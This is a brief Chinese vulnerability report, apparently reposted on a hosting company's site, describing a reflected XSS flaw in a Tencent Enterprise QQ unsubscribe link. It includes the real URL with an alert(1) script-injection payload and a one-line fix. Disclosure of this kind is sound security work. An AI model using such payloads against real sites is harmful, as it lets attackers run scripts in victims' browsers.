鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

腾讯企业QQ一处反射型XSS

来源:互联网 作者:佚名 时间:2015-10-19 08:32
企业qq群发信息的时候会附带一个 2周内不再接收此企业的群发消息 的链接: http://crm2.qq.com/page/portalpage/reject_msg.php?k=b66b5cf124e37a6c0b67999373ca83b9ac9bc34586ef022dd688321c6c3c3ccd 参数k未过滤直接输出。 http://crm2.qq.com/page/portalp
企业qq群发信息的时候会附带一个 “2周内不再接收此企业的群发消息” 的链接:
 
 
 
http://crm2.qq.com/page/portalpage/reject_msg.php?k=b66b5cf124e37a6c0b67999373ca83b9ac9bc34586ef022dd688321c6c3c3ccd
 
 
 
参数k未过滤直接输出。 
 


 
http://crm2.qq.com/page/portalpage/reject_msg.php?k=b66b5cf124e37a6c0b67999373ca83b9ac9bc34586ef022dd688321c6c3c3ccd%22%20/%3E%3Cscript%3Ealert(1)%3C/script%3E
 
修复方案:

对参数k进行过滤 
 

网友评论
<